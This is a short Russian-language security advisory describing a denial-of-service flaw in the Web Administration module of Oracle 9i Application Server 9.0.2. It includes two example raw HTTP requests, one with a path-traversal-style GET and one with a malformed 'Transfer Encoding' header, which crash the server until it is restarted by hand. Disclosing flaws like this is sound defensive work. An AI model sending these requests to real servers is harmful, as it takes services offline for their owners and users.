Oracle 9i Application Server (9iAS) позволяет удаленное администрирование через модуль Web доступа.
Злонамеренный сконструированный запрос к модулю Web
Administration приведет к аварийному завершению работы сервера. Для восстановления работы потребуется ручная перезагрузка. 

Пример: 

GET /../ HTTP/1.1 
host: hostname 
<ENTER> 
<ENTER> 

GET /example.html/ HTTP/1.1 
host: host name 
Transfer Encoding 
<ENTER> 
<ENTER> 

Уязвимость обнаружена в Oracle Oracle 9i Application Server 9.0.2.



Оставить мнение